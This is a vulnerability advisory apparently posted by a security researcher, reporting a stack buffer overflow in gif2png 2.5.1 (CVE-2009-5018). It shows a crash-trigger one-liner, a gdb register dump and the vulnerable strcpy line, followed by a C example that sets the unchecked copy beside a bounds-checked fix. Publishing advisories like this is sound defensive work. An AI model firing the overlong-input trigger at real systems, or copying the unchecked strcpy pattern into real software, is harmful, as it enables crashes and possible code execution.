Patroklos Argyroudis

gif2png command line buffer overflow

Tags: cgi, research, vulnerability, advisories, buffer overflow

A stack-based buffer overflow in gif2png (versions 2.5.1 and earlier) lets an attacker overwrite stack memory by supplying an overly long filename on the command line. Because the program copies the argument with an unbounded strcpy() into a fixed-size buffer, crafted input causes a crash and, when gif2png is invoked by other software (such as CGI scripts) that passes user-controlled filenames to it, could potentially lead to remote code execution. Tracked as CVE-2009-5018, the flaw illustrates the risk of unbounded command-line parsing in helper utilities.

We have discovered an "improper input validation" vulnerability in the gif2png utility that leads to a stack buffer overflow.

Details

gif2png is a utility that converts files from the Graphic Interchange Format (GIF) to Portable Network Graphics (PNG).

gif2png (up to and including version 2.5.1) is prone to a command line buffer overflow: a strcpy(3) call copies user-supplied data into a fixed-size buffer without bounds-checking it first. Here is a transcript of triggering the bug:

[argp@hegel /tmp]$ gif2png `python -c 'print "A"*2048'`
Segmentation fault (core dumped)
[argp@hegel /tmp]$ gdb -q gif2png -c core
(no debugging symbols found)

warning: Can't read pathname for load map: Input/output error.
Reading symbols from /usr/lib/libpng12.so.0...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libpng12.so.0
Reading symbols from /lib/i686/cmov/libm.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/i686/cmov/libm.so.6
Reading symbols from /usr/lib/libz.so.1...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libz.so.1
Reading symbols from /lib/i686/cmov/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/i686/cmov/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
(no debugging symbols found)
Core was generated by
`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0xb7e6c6ed in ?? () from /lib/i686/cmov/libc.so.6
gdb $ i r
eax            0x41414141   0x41414141
ecx            0xb7f5960c   0xb7f5960c
edx            0xbfffe960   0xbfffe960
ebx            0xb7f57ff4   0xb7f57ff4
esp            0xbfffe384   0xbfffe384
ebp            0xbfffe3d8   0xbfffe3d8
esi            0xb7f3b1da   0xb7f3b1da
edi            0xb7f3b1e4   0xb7f3b1e4
eip            0xb7e6c6ed   0xb7e6c6ed
eflags         0x10206  [ PF IF RF ]
cs             0x73 0x73
ss             0x7b 0x7b
ds             0x7b 0x7b
es             0x7b 0x7b
fs             0x0  0x0
gs             0x33 0x33

The bug is located in file gif2png.c, line 901: strcpy(name, argv[i]), where name is a fixed-size char array on the stack. Any argument longer than the array overwrites whatever follows it on the stack; in the transcript above the crash occurs inside libc with eax already holding 0x41414141, i.e. attacker-controlled bytes have reached a register.
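The vulnerable copy pattern next to a bounds-checked replacement, as an added example written for this page (it is not gif2png's own code). NAME_BUF_SIZE is an assumed size, since the advisory does not give the real length of name; copy_name_checked, process_args and make_trigger are illustrative names. The stand-alone main feeds the same 2048-byte argument the transcript uses and shows it being rejected instead of smashing the stack.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of gif2png's `name` array; the advisory does not state the
 * real value, so this is a placeholder for the example only. */
#define NAME_BUF_SIZE 256

/* The vulnerable shape of gif2png.c line 901, strcpy(name, argv[i]). Any
 * argument of NAME_BUF_SIZE bytes or more runs past the end of `name` on
 * the stack. Kept here only for comparison; never call it with untrusted
 * input. */
static void copy_name_unchecked(char *name, const char *arg)
{
    strcpy(name, arg);
}

/* Bounds-checked replacement. Returns 0 on success and -1 when `arg`
 * (plus its terminating NUL) does not fit in `name_size` bytes. The length
 * scan itself is bounded, so a missing terminator cannot run off the end
 * of `arg` either. Rejecting rather than truncating matters for filenames:
 * a silently truncated path would name a different file. */
int copy_name_checked(char *name, size_t name_size, const char *arg)
{
    size_t len = 0;

    if (name_size == 0)
        return -1;
    while (len < name_size && arg[len] != '\0')
        len++;
    if (len >= name_size)          /* no room left for the NUL */
        return -1;
    memcpy(name, arg, len + 1);
    return 0;
}

/* An argv loop in the shape of gif2png's: each filename is copied into a
 * stack buffer before use. Oversized arguments are reported and skipped.
 * Returns the number of accepted names; *rejected receives the rest. */
int process_args(int argc, char **argv, int *rejected)
{
    int accepted = 0;

    *rejected = 0;
    for (int i = 1; i < argc; i++) {
        char name[NAME_BUF_SIZE];

        if (copy_name_checked(name, sizeof name, argv[i]) != 0) {
            fprintf(stderr, "%s: argument %d too long (max %zu bytes)\n",
                    argv[0], i, sizeof name - 1);
            (*rejected)++;
            continue;
        }
        /* ... the conversion of `name` would happen here ... */
        accepted++;
    }
    return accepted;
}

/* Builds the trigger from the transcript, `python -c 'print "A"*2048'`,
 * as a heap string (constructed input). Caller frees. */
char *make_trigger(size_t n)
{
    char *s = malloc(n + 1);

    if (s == NULL)
        return NULL;
    memset(s, 'A', n);
    s[n] = '\0';
    return s;
}

int main(void)
{
    char name[NAME_BUF_SIZE];
    char *trigger = make_trigger(2048);
    char *argv[] = { "gif2png", "in.gif", trigger, NULL };
    int rejected;
    int accepted;

    if (trigger == NULL)
        return 1;
    copy_name_unchecked(name, "in.gif");        /* benign input is fine */
    printf("unchecked copy of a short name: %s\n", name);
    accepted = process_args(3, argv, &rejected);
    printf("accepted=%d rejected=%d\n", accepted, rejected);
    free(trigger);
    return 0;
}
```

The check lives in the callee on purpose: a wrapper that hands gif2png user-controlled filenames cannot know the callee's buffer size, so the utility itself has to refuse anything that does not fit, with the terminator included in the count.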

This may have security repercussions if gif2png is configured as a handler for other applications that pass user-supplied filenames to it on the command line (e.g. from a CGI script or a similar front end).